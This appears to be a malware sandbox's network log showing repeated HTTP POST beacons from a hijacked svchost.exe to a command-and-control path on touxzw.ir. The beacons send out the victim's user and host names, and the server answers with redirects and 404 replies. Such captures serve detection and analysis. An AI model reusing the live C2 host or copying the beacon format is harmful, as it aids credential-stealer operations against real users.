Feb 20, 2025 03:43:23.729996920 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:24.489306927 CET	826	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 02:43:24 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ds%2F7IBPDIRuNLIPDDh33Dg1htxdUCqfcwb%2FNYfpyDg%2Ba1nIYNjf%2FSSkDNhAyLB1hQNv16%2BShaLUMAENx6Nz%2BJ5vbQLaF6ruhKrhlbvcufnrpcU5XxFako1b3G4I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b261bcd4243e8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1748&min_rtt=1748&rtt_var=874&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49737	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:25.645998001 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:43:25.651125908 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:26.463025093 CET	846	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:43:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1MIw5l8tjXhoGM2wfeWHKuirceM8H4i2oB%2F9pa2YkhqyKcqj9VyZx%2BHMDuvoaUr5%2FhyDNN5oyfKtVLHZlf%2F1oK82kREFP4u0c%2FPXrSfX8HyJP7VA3paipI926Yw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b2627fc2a43f8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1733&min_rtt=1733&rtt_var=866&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49738	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:27.747466087 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:43:27.752712965 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:28.504662037 CET	828	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 02:43:28 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BkMutX6%2BH%2F8LrqZmd5FZXOcYPMJ1FqLCetrcJEGqL%2FoBj7CqXSPcaOEvsavN%2Fi93yIxZPd2zLPnJkf3OU%2BUtz%2FhFAzqosjvIfk9AR9jL9hBReETWSA8orFEqjWk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b2634fb8b5e74-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1786&min_rtt=1786&rtt_var=893&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=110&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49741	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:29.654202938 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:43:29.660542965 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:30.375478983 CET	824	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 02:43:30 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AQM06%2BikAdI5ZS1bJ6M1vQEMiw4VxgQjSKdK1PMTHLAqUye4DiJCbnp0ObvE4JY%2B%2B9J7I%2F6rj0QbPkPbQ1Mit3pVMqmpv3PBgOiBBydb5JB%2Bxm1H7Zd3x9G2oRE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b2640d949f5f8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1848&min_rtt=1848&rtt_var=924&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:31.516771078 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:43:31.521909952 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:32.301815987 CET	838	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:43:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7t5gVaAOXgHqYf4VGzzJuqmIt26eofZ5Id5JZej4eB%2BOHVIEZAzzSzR84eqeViuAKvu92WZ6Zajrh5GQ0ndZ48LoBciu7aAA29uUVKRLzfWRzZA2y9tgVgVh4mg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b264c7dd041e0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1789&rtt_var=894&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:33.451307058 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:43:33.456489086 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:34.207351923 CET	826	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 02:43:34 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DJFRqI%2B922YO%2B%2B9zgHGwV9of%2FajoAGUBWYjJypHMNp8aYlWyauf%2FoByT3wzpP2UFY%2BvWKYwjlSpHpDx8rw4T1G0Z3Xc5EPyiuHtAyr2ZLeUUiRvXCW4b20E1V7s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b26589ca76a55-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1638&rtt_var=819&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49748	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:35.358187914 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:43:35.363344908 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:36.139050007 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 02:43:36 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C%2BnqIPk4kaoJl%2FhcJ6UN0XAWw0UvceBENEYuKs94G5yuuKShVGIL7G6WkT39u3ekd2AWi2syKFJUtpQiVXgP4j5av1z1Fi23EbxEg3ryPWRDHMVqUEq6JDmgjO8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b26649deb72b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=20434&min_rtt=20434&rtt_var=10217&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49749	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:37.298062086 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:43:37.303124905 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:38.070710897 CET	842	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:43:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TP7OHEO2JtUGsJ0XGGVrj%2BK0RqAdfxHlxmK4%2BwcLdF1Pmfczu8COSzRuLp1sVuXeEG1bTkWmOXtn1Ss4U2x7CcRUQfswJ%2BDWR8VaKYl4mrBRvl926DtDDlAF87E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b26709cf20f4a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1671&rtt_var=835&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49750	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:39.200334072 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:43:39.205647945 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:39.936440945 CET	824	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 02:43:39 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0wd7ndtfYxPR5lE9bwtM8t%2Fuv83GHmP%2FcBoCD36EvXUXdAmHI2r1X2cE4wTHwKLVzbkmtm7atB12ev8m%2BuF0f29j5pUabmpGE%2F9Y%2F0WKcOoUMX6qFuTSEeyuHyQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b267c7be24363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1704&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49751	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:41.129297018 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:43:41.134380102 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:41.914738894 CET	846	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:43:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ONFE%2BPUUgf9QUkOAA0nbcXmN%2FsMlc2nlfcQhBH0YPe259Z7OXywIsCo%2Fl8Xwuj4VgVpOiE1%2Fdtx9KdR9s0Q4I6y7NKljBx1H%2BIim5zXg8u03ogufaOZS8EUob5g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b26889fb24307-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1739&min_rtt=1739&rtt_var=869&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49752	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:43.085863113 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:43:43.094784021 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:43.907433033 CET	849	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:43:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pltY1NYLkBXdfg7CQ8noaPJWylUy%2BCzpEfN7uX8PNe7xiHl1thgqDgNigf9dP5n9yWnoo62JmuEo%2FvtD%2Boy9pxwww635m1DrAsC3guefusOr1m36de%2Fp%2F36ABL8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b2694ed037d26-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=11004&min_rtt=11004&rtt_var=5502&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49753	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:45.097601891 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:43:45.102722883 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:45.838972092 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 02:43:45 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FwF3voUK%2FN5%2BV2rA6TEePhjuERt4M6xHLyN8YpRPRRgIF1kU8mvDbmeMrWPjc9Zyb2wqFvE%2Bxt1tsp6miu9ELqCFv288Ke1sxgIsmJ6sFafIJg3KHRCL%2F8U7Dnw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b26a15dcbde9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1724&rtt_var=862&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49754	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:46.991051912 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:43:46.997245073 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:47.712637901 CET	842	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:43:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2zPe9FJKjb2wexiRuBckLXj9LRQMRFO%2BLqclEJ9QeBQNBkfT82fNLgfZAlfl5y0ekrBZZtxkr5uF8cIoaFdnOXDdswiEUur1ZLTxQ3ghrcchxdYfYhjjfJpnBBg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b26ad8d6b41db-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=37189&min_rtt=37189&rtt_var=18594&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49755	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:48.859348059 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:43:48.866259098 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:49.660723925 CET	841	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:43:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hi2T4UXx6nRCSnxZtc5hGw7jl0U6nE7Zc0lLFLFZMlW0n4SKrebqYDI%2Bt36J2pihCzgwMm%2FsQDI2vL37Yjzy5bmo4J%2FUJEI29dQpVYUq3lVdxMDyGEBVzKjdY5E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b26b91a374374-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1744&rtt_var=872&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=65&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
